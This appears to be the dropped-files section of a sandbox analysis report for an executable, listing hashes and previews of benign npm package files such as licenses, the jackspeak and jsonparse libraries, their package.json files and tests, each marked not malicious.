              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1552
              Entropy (8bit):4.503076019303801
              Encrypted:false
              SSDEEP:
              MD5:95E9F67F2840DF3A3A09A77EF3AEA34B
              SHA1:04B424DF89F0C4840F5F64286A19AFD84BEE2466
              SHA-256:8A1AF140FDFBF5AFD3DF27F7E662F989C5B963A300020DFAFCE42033CAE9E004
              SHA-512:B1E087EC6F6E4A139B043C99B203D75AC1AD10C23148DF1417B191DC382649D076C05D0EAF640F667B9C8B1EBE0D0F185E03F0D9F3D6D67D58776EC28E90F0C4
              Malicious:false
              Reputation:unknown
              Preview:# Blue Oak Model License..Version 1.0.0..## Purpose..This license gives everyone as much permission to work with.this software as possible, while protecting contributors.from liability...## Acceptance..In order to receive this license, you must agree to its.rules. The rules of this license are both obligations.under that agreement and conditions to your license..You must not do anything with this software that triggers.a rule that you cannot or will not follow...## Copyright..Each contributor licenses you to do everything with this.software that would otherwise infringe that contributor's.copyright in it...## Notices..You must ensure that everyone who gets a copy of.any part of this software from you, with or without.changes, also gets the text of this license or a link to.<https://blueoakcouncil.org/license/1.0.0>...## Excuse..If anyone notifies you in writing that you have not.complied with [Notices](#notices), you can keep your.license by taking all practical steps to comply within
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):30550
              Entropy (8bit):4.3381528834108725
              Encrypted:false
              SSDEEP:
              MD5:7BF1AA829F66F633904AE8780777677C
              SHA1:FC85ACA55C98D225161033AB1B2B12E84DCFFAA9
              SHA-256:18E9A5D212F8B2C46DE58BF4724AD8D889DE39DA2D7FC0217BF8AF34B94C4055
              SHA-512:A3E8A19502590F50DA25893B02C24DB9ED65067F32BE727ABB7FC6983EAA697E3B04C27D9F21813733F3D25EC786FC79DB8478026F6F94CF789874C5E0A5BAE1
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.jack = exports.Jack = exports.isConfigOption = exports.isConfigType = void 0;.const node_util_1 = require("node:util");.const parse_args_js_1 = require("./parse-args.js");.// it's a tiny API, just cast it inline, it's fine.//@ts-ignore.const cliui_1 = __importDefault(require("@isaacs/cliui"));.const node_path_1 = require("node:path");.const width = Math.min((process && process.stdout && process.stdout.columns) || 80, 80);.// indentation spaces from heading level.const indent = (n) => (n - 1) * 2;.const toEnvKey = (pref, key) => {. return [pref, key.replace(/[^a-zA-Z0-9]+/g, ' ')]. .join(' '). .trim(). .toUpperCase(). .replace(/ /g, '_');.};.const toEnvVal = (value, delim = '\n') => {. const str = typeof value === 'string'. ?
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1773
              Entropy (8bit):5.026779527402647
              Encrypted:false
              SSDEEP:
              MD5:B27FF7C9B0B22C4A12A6DD25A8D57FA3
              SHA1:B99935DE88ACC8E971D8872DED032441773C2B73
              SHA-256:DFF16057CFA4099DDA33A94A2D8C206BD80E45B19E70CECEE3D341C28924F191
              SHA-512:F7D62628BF3085AC6BA72F5A438F56B516E6D2B27E7C5FC196E598C73F30404DBED89244942CAE7B9EA9D0866D7C667EF2C92543025EE55BFE4C823006444E59
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):29978
              Entropy (8bit):4.304436475863612
              Encrypted:false
              SSDEEP:
              MD5:59C11EC62B6461E55D2B951956C958F9
              SHA1:30B649D52D51E7A0F701F3CE1EBF8068F0459E2D
              SHA-256:8CE811E681C52207996B07E1BDE42D97D934683E775F76B84115322ED10D8639
              SHA-512:1927F80E6312D294E1156CE98F54DEAF7DAAD249EE8C2F885BCF5A2FAD280CB43A55FC18CB216DBC98ED92B80C3F838C87AB8FF7072A3F13FDC7ADD3A4A3D6FB
              Malicious:false
              Reputation:unknown
              Preview:import { inspect } from 'node:util';.import { parseArgs } from './parse-args.js';.// it's a tiny API, just cast it inline, it's fine.//@ts-ignore.import cliui from '@isaacs/cliui';.import { basename } from 'node:path';.const width = Math.min((process && process.stdout && process.stdout.columns) || 80, 80);.// indentation spaces from heading level.const indent = (n) => (n - 1) * 2;.const toEnvKey = (pref, key) => {. return [pref, key.replace(/[^a-zA-Z0-9]+/g, ' ')]. .join(' '). .trim(). .toUpperCase(). .replace(/ /g, '_');.};.const toEnvVal = (value, delim = '\n') => {. const str = typeof value === 'string'. ? value. : typeof value === 'boolean'. ? value. ? '1'. : '0'. : typeof value === 'number'. ? String(value). : Array.isArray(value). ? value. .map((v) => toEnvVal(v)). .join(delim).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):706
              Entropy (8bit):4.763737986214199
              Encrypted:false
              SSDEEP:
              MD5:79F15C80DBB0C33B9957A05E7118CFE3
              SHA1:006D666F61E8705C3FD4DF6D2B6EF6EC8ECB65DA
              SHA-256:97597EF290528B4877405477BDCEA1DDA66B0D18AC125E668EDD001DF3292492
              SHA-512:C60DCC64B59FB4736C741C08A94C95FDF8BE14F83EC828A7B033C3D092D785EA1A2857A19F6D9BA7EDDF5BC1FA1503B1098FD955034C0CD41A1F835137EEBA8E
              Malicious:false
              Reputation:unknown
              Preview:import * as util from 'util';.const pv = typeof process === 'object' &&. !!process &&. typeof process.version === 'string'. ? process.version. : 'v0.0.0';.const pvs = pv. .replace(/^v/, ''). .split('.'). .map(s => parseInt(s, 10));./* c8 ignore start */.const [major = 0, minor = 0] = pvs;./* c8 ignore stop */.let { parseArgs: pa, } = util;./* c8 ignore start */.if (!pa ||. major < 16 ||. (major === 18 && minor < 11) ||. (major === 16 && minor < 19)) {. /* c8 ignore stop */. // Ignore because we will clobber it for commonjs. //@ts-ignore. pa = (await import('@pkgjs/parseargs')).parseArgs;.}.export const parseArgs = pa;.//# sourceMappingURL=parse-args.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2157
              Entropy (8bit):4.620174582192484
              Encrypted:false
              SSDEEP:
              MD5:6212D00C4F1D5BD0F9C0220E6EE219E1
              SHA1:8940E363CCBC3562F5A24268CD946D0DEDCD7E50
              SHA-256:486F4999529EA0092C0334ACE0D4DBCA32A9A6D098367E8F292D909EB6E0D460
              SHA-512:5418C334BB5588A7657ED4CF4E8DD79C970CD81BF05588CB59CE0F11656DE0EEBFF5E11E20C01305D3B3BDFA6EF0FA9AA77C966F43099058BB0443BF8A4D2C84
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "jackspeak",. "version": "2.3.6",. "description": "A very strict and proper argument parser.",. "tshy": {. "main": true,. "exports": {. "./package.json": "./package.json",. ".": "./src/index.js". }. },. "main": "./dist/commonjs/index.js",. "types": "./dist/commonjs/index.d.ts",. "type": "module",. "exports": {. "./package.json": "./package.json",. ".": {. "import": {. "types": "./dist/esm/index.d.ts",. "default": "./dist/esm/index.js". },. "require": {. "types": "./dist/commonjs/index.d.ts",. "default": "./dist/commonjs/index.js". }. }. },. "files": [. "dist". ],. "scripts": {. "build-examples": "for i in examples/*.js ; do node $i -h > ${i/.js/.txt}; done",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "prepare": "tshy",. "pretest": "npm run prepare",. "presnap": "npm run prepare",. "test": "tap"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):1209
              Entropy (8bit):5.1426694048968935
              Encrypted:false
              SSDEEP:
              MD5:16D4FF0E774195FA8CEE4940A14E99D6
              SHA1:391A564224B9E883E82E481E622017B8744194F3
              SHA-256:50627796EB4236CD05674E71D090E594447995225B7D94CD59E57C25FA3A0217
              SHA-512:6E5218BA90233F21AE2A3CA5649CC88D06B64CFB83D0CBC1C5368455CFB4623EE331D9E0B312FD601B042EA210FBCF5B6BD8F919EEF49F298CACC59012AC4598
              Malicious:false
              Reputation:unknown
              Preview:Copyright 2017 Kat March.n.Copyright npm, Inc...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CON
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3940
              Entropy (8bit):4.866643048374265
              Encrypted:false
              SSDEEP:
              MD5:656189C10DD96C6797231631D4D9A958
              SHA1:D5CCA557C325594B752E460F4E27AA2AEBD8DAB1
              SHA-256:0DB93BAC439C17B6181B97D06E82A1F866A3A7AA90290F6BDEC65354D206D5E4
              SHA-512:7686EE1DC8533CB2D1FE54F001A459905E9937345858E556F0D8643EB06CE91F2AF7D04180186B59E619E9ABA48959B7816EB6D0AE26040560C31932DC6672FF
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const hexify = char => {. const h = char.charCodeAt(0).toString(16).toUpperCase(). return '0x' + (h.length % 2 ? '0' : '') + h.}..const parseError = (e, txt, context) => {. if (!txt) {. return {. message: e.message + ' while parsing empty string',. position: 0,. }. }. const badToken = e.message.match(/^Unexpected token (.) .*position\s+(\d+)/i). const errIdx = badToken ? +badToken[2]. : e.message.match(/^Unexpected end of JSON.*/i) ? txt.length - 1. : null.. const msg = badToken ? e.message.replace(/^Unexpected token ./, `Unexpected token ${. JSON.stringify(badToken[1]). } (${hexify(badToken[1])})`). : e.message.. if (errIdx !== null && errIdx !== undefined) {. const start = errIdx <= context ? 0. : errIdx - context.. const end = errIdx + context >= txt.length ? txt.length. : errIdx + context.. const slice = (start === 0 ? '' : '...') +. txt.slice(start, end) +. (end === txt.length ? '' : '...').. co
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1127
              Entropy (8bit):4.7294886396215565
              Encrypted:false
              SSDEEP:
              MD5:C729BE6D9FE823260529FC04C006662D
              SHA1:39FB837C1F2D2182630C79EB25FEEEDD75A6077E
              SHA-256:89D8FE7BBD22D05A854DC2E75D0B7E431ABE8E09B712ADBC7C4A9857B0BA044E
              SHA-512:8BCB85271FD0218CBA8D48EA0CA8A9A4979105FAA9A6217A1835727E9B14D0FAD7724C3E7A1AD1BA4DA940EC27383676185DAC8A1AA5EFB5F21DFCC6A875A5EC
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "json-parse-even-better-errors",. "version": "3.0.0",. "description": "JSON.parse with context information on error",. "main": "lib/index.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/json-parse-even-better-errors.git". },. "keywords": [. "JSON",. "parser". ],. "author": "GitHub Inc.",. "license": "MIT",. "devDependencies": {. "@npmcli/eslint-config": "^3.1.0",. "@npmcli/template-oss": "4.5.1",. "tap": "^16.3.0". },. "tap": {. "check-coverage": true,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/te
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1014
              Entropy (8bit):4.7954943317987295
              Encrypted:false
              SSDEEP:
              MD5:F507F6656B645BA64B1D98111011E119
              SHA1:E82578B1532B6D7A3E14F15ED0B112501124C81C
              SHA-256:147793D35531640852978AFAC1C00BBB01856F208CBA57428B7BC29683A5EC44
              SHA-512:FEDC9903F662F911F1F375E59D80BAE5E9B986D91A74C5CD7A1ABDDFA359B00193D495E2AF1C219A5AC6E0CE0F94398AFAE4A242C639DBBBE8F6D43B8901C805
              Malicious:false
              Reputation:unknown
              Preview:const isObj = val => !!val && !Array.isArray(val) && typeof val === 'object'..const compare = (ak, bk, prefKeys) =>. prefKeys.includes(ak) && !prefKeys.includes(bk) ? -1. : prefKeys.includes(bk) && !prefKeys.includes(ak) ? 1. : prefKeys.includes(ak) && prefKeys.includes(bk). ? prefKeys.indexOf(ak) - prefKeys.indexOf(bk). : ak.localeCompare(bk, 'en')..const sort = (replacer, seen) => (key, val) => {. const prefKeys = Array.isArray(replacer) ? replacer : [].. if (typeof replacer === 'function'). val = replacer(key, val).. if (!isObj(val)). return val.. if (seen.has(val)). return seen.get(val).. const ret = Object.entries(val).sort(. ([ak, av], [bk, bv]) =>. isObj(av) === isObj(bv) ? compare(ak, bk, prefKeys). : isObj(av) ? 1. : -1. ).reduce((set, [k, v]) => {. set[k] = v. return set. }, {}).. seen.set(val, ret). return ret.}..module.exports = (obj, replacer, space = 2) =>. JSON.stringify(obj, sort(replacer, new Map()), space). + (space
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1085
              Entropy (8bit):4.694385087895049
              Encrypted:false
              SSDEEP:
              MD5:0DB2DF94DF2CBC8CC6ADF188846A68CF
              SHA1:ADEF02A4345A493535CCB990B09F850508AE516F
              SHA-256:B1517D9A73D96ECF3B9C8B868F48E2BEA71B8E13631BFCEB2D7E9CE5830E69FA
              SHA-512:97B87B4422CB772738E34B9202D30C961126112E331C4F13254E9DC0CEE5257B46E6341442A0BF895B6D2067B4BC346FCAF154C327B175D19373987A404DA9E6
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "json-stringify-nice",. "version": "1.1.4",. "description": "Stringify an object sorting scalars before objects, and defaulting to 2-space indent",. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "posttest": "npm run lint",. "snap": "tap",. "postsnap": "npm run lintfix",. "eslint": "eslint",. "lint": "npm run eslint -- index.js test/**/*.js",. "lintfix": "npm run lint -- --fix",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "tap": {. "test-env": [. "LC_ALL=sk". ],. "check-coverage": true. },. "devDependencies": {. "eslint": "^7.25.0",. "eslint-plugin-import": "^2.22.1",. "eslint-plugin-node": "^11.1.0",. "eslint-plugin-promise": "^5.1.0",. "eslint-plugin-standard": "^5.0.0",. "tap": "^15.0.6". },. "funding": {. "url": "https://github.com/sponsors/isaacs". },. "repository"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1087
              Entropy (8bit):5.068860074291689
              Encrypted:false
              SSDEEP:
              MD5:566D04C41BFBE138F33E4FFD343E11E4
              SHA1:92D015C08FF4F16E9C86997887BB9DEA677F9C18
              SHA-256:ED251DC3A48522399FFFE95FE04D94FBCADCD9EDD0E7689F3B71CF73403A6138
              SHA-512:A113C0F7F9C1D1A7E62DF47C40D2F6ACB2CC1084D815FD0BC2C2365E524C5C241B87FAAE731A89B81C734A9208A8A51CA3E3BDFD155D50B776F76C0209F915CA
              Malicious:false
              Reputation:unknown
              Preview:The MIT License..Copyright (c) 2012 Tim Caswell..Permission is hereby granted, free of charge, .to any person obtaining a copy of this software and .associated documentation files (the "Software"), to .deal in the Software without restriction, including .without limitation the rights to use, copy, modify, .merge, publish, distribute, sublicense, and/or sell .copies of the Software, and to permit persons to whom .the Software is furnished to do so, .subject to the following conditions:..The above copyright notice and this permission notice .shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, .EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES .OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. .IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR .ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, .TORT OR OTHERWISE, ARISING FROM, OU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):556
              Entropy (8bit):4.752239266233165
              Encrypted:false
              SSDEEP:
              MD5:5FE57314EAB02419002A5677990F59E8
              SHA1:82CD080436637B5AEB180A37862B50D33ED4530D
              SHA-256:4C57B725091BBC8AD7C85A57F9A529128C2144EBA897AC5307269CBAF642AC21
              SHA-512:6F1A2CB8963FFF68F8A57DF74C6D984D2B1049690DEC44AB89A51D4465A6A8006783A74E61C421698FD017DF0ADB62C28AA7D3E629D7974F20D9A25C5C89C2BB
              Malicious:false
              Reputation:unknown
              Preview:var fs = require('fs'),. Parser = require('./jsonparse');...var json = fs.readFileSync("samplejson/basic.json");...while (true) {. var start = Date.now();. for (var i = 0; i < 1000; i++) {. JSON.parse(json);. }. var first = Date.now() - start;.. start = Date.now();. var p = new Parser();. for (var i = 0; i < 1000; i++) {. p.write(json);. }. var second = Date.now() - start;... console.log("JSON.parse took %s", first);. console.log("streaming parser took %s", second);. console.log("streaming is %s times slower", second / first);.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1003
              Entropy (8bit):4.938220409101365
              Encrypted:false
              SSDEEP:
              MD5:7EC31B251C74B78DBF111C6C972D1FE2
              SHA1:18685AE252AE4159D32CC8784909484E6AD027D8
              SHA-256:D7E0AB747DFBB9144B5D8F6EE4C74FAB90B944CA6950F3AFA6242F323487B787
              SHA-512:18598EE100AEA0B5B9AEE7CB94B39CFA2F5F83BB93EE9C441DE505F4792A02EDA0F8D47E8889D0EF50EC157352A63EEEC05744BAC0D47222638BD43AEDF83E76
              Malicious:false
              Reputation:unknown
              Preview:var Parser = require('../jsonparse');.var Http = require('http');.require('./colors');.var p = new Parser();.var cred = require('./credentials');.var client = Http.createClient(80, "stream.twitter.com");.var request = client.request("GET", "/1/statuses/sample.json", {. "Host": "stream.twitter.com",. "Authorization": (new Buffer(cred.username + ":" + cred.password)).toString("base64").});.request.on('response', function (response) {. console.log(response.statusCode);. console.dir(response.headers);. response.on('data', function (chunk) {. p.write(chunk);. });. response.on('end', function () {. console.log("END");. });.});.request.end();.var text = "", name = "";.p.onValue = function (value) {. if (this.stack.length === 1 && this.key === 'text') { text = value; }. if (this.stack.length === 2 && this.key === 'name' && this.stack[1].key === 'user') { name = value; }. if (this.stack.length === 0) {. console.log(text.blue + " - " + name.yellow);. text = name = "";. }.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):15570
              Entropy (8bit):4.943609287417881
              Encrypted:false
              SSDEEP:
              MD5:960C7FD2E8C313C8F63E8C73C0A82749
              SHA1:4829ECBEFCD51EB002D56B4F335759209F41CC72
              SHA-256:8FEE0DA896C802CCC73D8F0DB740625AD0DD6B403A7BC5C86F4AFDD17BA8941E
              SHA-512:EEA64B414C7CE45DB0AE6ADAEF8BD11734E601263374EDA70161653E2756EC30115A1ADF36C121AE2056CBF9A2584AC0804FD41A5F43D3810DB9342332FEA852
              Malicious:false
              Reputation:unknown
              Preview:/*global Buffer*/.// Named constants with unique integer values.var C = {};.// Tokens.var LEFT_BRACE = C.LEFT_BRACE = 0x1;.var RIGHT_BRACE = C.RIGHT_BRACE = 0x2;.var LEFT_BRACKET = C.LEFT_BRACKET = 0x3;.var RIGHT_BRACKET = C.RIGHT_BRACKET = 0x4;.var COLON = C.COLON = 0x5;.var COMMA = C.COMMA = 0x6;.var TRUE = C.TRUE = 0x7;.var FALSE = C.FALSE = 0x8;.var NULL = C.NULL = 0x9;.var STRING = C.STRING = 0xa;.var NUMBER = C.NUMBER = 0xb;.// Tokenizer States.var START = C.START = 0x11;.var STOP = C.STOP = 0x12;.var TRUE1 = C.TRUE1 = 0x21;.var TRUE2 = C.TRUE2 = 0x22;.var TRUE3 = C.TRUE3 = 0x23;.var FALSE1 = C.FALSE1 = 0x31;.var FALSE2 = C.FALSE2 = 0x32;.var FALSE3 = C.FALSE3 = 0x33;.var FALSE4 = C.FALSE4 = 0x34;.var NULL1 = C.NULL1 = 0x41;.var NULL2 = C.NULL2 = 0x42;.var NULL3 = C.NULL3 = 0x43;.var NUMBER1 = C.NUMBER1 = 0x51;.var N
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):551
              Entropy (8bit):4.69703295227495
              Encrypted:false
              SSDEEP:
              MD5:EE8BCD21A4F6FF17D0894EA591AE0032
              SHA1:EC0BB766BF32EBD53D835393DA006BB834A663FD
              SHA-256:FD84A394475582D3ACA1DA89B9D2DBB193BA7952DA9F8C01A5A5474505185A29
              SHA-512:1C49871E38F2DB583D1C5C0DBB9597845857FBBAF320BB2713CBC5ED9B69D64CB33A7A38FCF155580E2AB35CAC0D9DF0287DAAE92478274E5D8F6FC27CF9C9B1
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "jsonparse",. "description": "This is a pure-js JSON streaming parser for node.js",. "tags": ["json", "stream"],. "version": "1.3.1",. "author": "Tim Caswell <tim@creationix.com>",. "repository": {. "type": "git",. "url": "http://github.com/creationix/jsonparse.git". },. "devDependencies": {. "tape": "~0.1.1",. "tap": "~0.3.3". },. "scripts": {. "test": "tap test/*.js". },. "bugs": "http://github.com/creationix/jsonparse/issues",. "engines": ["node >= 0.2.0"],. "license": "MIT",. "main": "jsonparse.js".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):4364
              Entropy (8bit):4.384086673415309
              Encrypted:false
              SSDEEP:
              MD5:4B7080EFDDFC3D72D6D37236DA7B59BF
              SHA1:749F941081D2DDDAF06CBB506EB157ADE37117DA
              SHA-256:07ABE37A28F8E0BE74364E93AD2E030E6EE629AC5F8CEAABAB5B7C7131816680
              SHA-512:95DC15CA9A06CC49B0D3623861B779B49378B9C60EED09B7DDEB52CCC90572E9AB1D6BE212AD79204F48CDFE9378425C0801274AFA5DEF9C4E44A0B23AC1EB2B
              Malicious:false
              Reputation:unknown
              Preview:[. {. },. {. "image": [. {"shape": "rect", "fill": "#333", "stroke": "#999", "x": 0.5e+1, "y": 0.5, "z": 0.8e-0, "w": 0.5e5, "u": 2E10, "foo": 2E+1, "bar": 2E-0, "width": 47, "height": 47}. ],. "jumpable": 3,. "solid": {. "1": [2,4],. "2": [],. "3": [2,6],. "4": [],. "5": [2,8,1,3,7,9,4,6],. "6": [],. "7": [4,8],. "8": [],. "9": [6,8]. },. "corners": {"1": true,"3": true,"7": true,"9": true}. },. {. "image": [. {"shape": "polygon", "fill": "#248", "stroke": "#48f", "points": [[0.5,47.5],[47.5,47.5],[47.5,0.5]]}. ],. "solid": {. "1": [2,4],. "2": [1],. "3": [2],. "4": [],. "5": [2,8,1,3,7,9,4,6],. "6": [],. "7": [4,8],. "8": [],. "9": [6,8]. },. "corners": {"1": true,"3": true,"7": false,"9": true}. },. {. "image": [. {"shape": "polygon", "fill": "#248", "stroke": "#48f", "points": [[0.5,0.5],[47.5,47.5],[0.5,47.5]]}. ],. "solid": {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):4591
              Entropy (8bit):4.37197702636553
              Encrypted:false
              SSDEEP:
              MD5:60983AECC406A831D67D288BCDD04E11
              SHA1:117E4087D922CF0AD27DE0AFD7A2211287BE8B40
              SHA-256:C27C2194631E6A24DD8FC953FF300A49B2B04915945500E8DE99B67E673767CB
              SHA-512:3331355A6C84C48A90EACB255044E4D2CD2546BCBA675AFE5B72585F215B1DE826983DF3089C243B668D5FB6F92115E94BF64F041D58553F3FCFCE76ABFD4091
              Malicious:false
              Reputation:unknown
              Preview:[. {. },. {. "image": [. {"shape": "rect", "fill": "#333", "stroke": "#999", "x": 0.5, "y": 0.5, "width": 47, "height": 47}. ],. "jumpable": 3,. "solid": {. "1": [2,4],. "2": [],. "3": [2,6],. "4": [],. "5": [2,8,1,3,7,9,4,6],. "6": [],. "7": [4,8],. "8": [],. "9": [6,8]. },. "corners": {"1": true,"3": true,"7": true,"9": true}. },. {. "image": [. {"shape": "polygon", "fill": "#248", "stroke": "#48f", "points": [[0.5,47.5],[47.5,47.5],[47.5,0.5]]}. ],. "solid": {. "1": [2,4],. "2": [1],. "3": [2],. "4": [],. "5": [2,8,1,3,7,9,4,6],. "6": [],. "7": [4,8],. "8": [],. "9": [6,8]. },. "corners": {"1": true,"3": true,"7": false,"9": true}. },. {. "image": [. {"shape": "polygon", "fill": "#248", "stroke": "#48f", "points": [[0.5,0.5],[47.5,47.5],[0.5,47.5]]}. ],. "solid": {. "1": [2],. "2": [3],. "3": [2,6],. "4": [],.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):708
              Entropy (8bit):4.857994812721928
              Encrypted:false
              SSDEEP:
              MD5:12C9F89BEF47E64A63C6C3F930D5F8B3
              SHA1:AD86A8425E49AF2E1BB9EF5630C8FEF81355342A
              SHA-256:3A0B6A085448EE92F0D8C5B24CF32818602AEFF7BA9CAF625926D8806F29458A
              SHA-512:040D3F6CEC5008EFD6F9058B715BD9992CE9BA5EA040DC02EB4B19D29BBF945C92531386E2C48EA13D7F8434DB09AE9797BB28E0274FE32B0DC33D7DB19822E0
              Malicious:false
              Reputation:unknown
              Preview:var stream = require('stream');.var JsonParse = require('../jsonparse');.var test = require('tape');..test('can handle large tokens without running out of memory', function (t) {. var parser = new JsonParse();. var chunkSize = 1024;. var chunks = 1024 * 200; // 200mb. var quote = Buffer.from ? Buffer.from('"') : new Buffer('"');. t.plan(1);.. parser.onToken = function (type, value) {. t.equal(value.length, chunkSize * chunks, 'token should be size of input json');. t.end();. };.. parser.write(quote);. for (var i = 0; i < chunks; ++i) {. var buf = Buffer.alloc ? Buffer.alloc(chunkSize) : new Buffer(chunkSize);. buf.fill('a');. parser.write(buf);. }. parser.write(quote);.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):2777
              Entropy (8bit):5.031710091189347
              Encrypted:false
              SSDEEP:
              MD5:05CB13134A229813380AE336F4E54299
              SHA1:72333D171023AD358B71E65069A48599F426684D
              SHA-256:5C4C3A8CD7F15D723A5E1F8075FE6C8F13017314F4061AA524F4BA7EA8E3F533
              SHA-512:D218D30B687F534ED581C436722B75DF2C2FA0C1715BFE63A84C3AA25BA40E3071DFB6C5493C727CAF168EE9FF75C2FEB6EAA5EB842094E8BF10D2618D4EAEE3
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var Parser = require('../');..test('2 byte utf8 \'De\' character: .', function (t) {. t.plan(1);.. var p = new Parser();. p.onValue = function (value) {. t.equal(value, '.');. };.. var de_buffer = new Buffer([0xd0, 0xb4]);.. p.write('"');. p.write(de_buffer);. p.write('"');..});..test('3 byte utf8 \'Han\' character: .', function (t) {. t.plan(1);.. var p = new Parser();. p.onValue = function (value) {. t.equal(value, '.');. };.. var han_buffer = new Buffer([0xe6, 0x88, 0x91]);. p.write('"');. p.write(han_buffer);. p.write('"');.});..test('4 byte utf8 character (unicode scalar U+2070E): ..', function (t) {. t.plan(1);.. var p = new Parser();. p.onValue = function (value) {. t.equal(value, '..');. };.. var Ux2070E_buffer = new Buffer([0xf0, 0xa0, 0x9c, 0x8e]);. p.write('"');. p.write(Ux2070E_buffer);. p.write('"');.});..test('3 byte utf8 \'Han\' character chunked inbetween 2nd and 3rd byte: .', function (t) {. t.pl
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):5.115903756690184
              Encrypted:false
              SSDEEP:
              MD5:280186EBC27EBD37203F0FDE6CC7E5E5
              SHA1:0EE4E871FBFA406CBF1FB9A353673AE50057EB84
              SHA-256:925FD9424B8EEFB09C5D54A1AD13F528979643970DAE96CCED0737968C841259
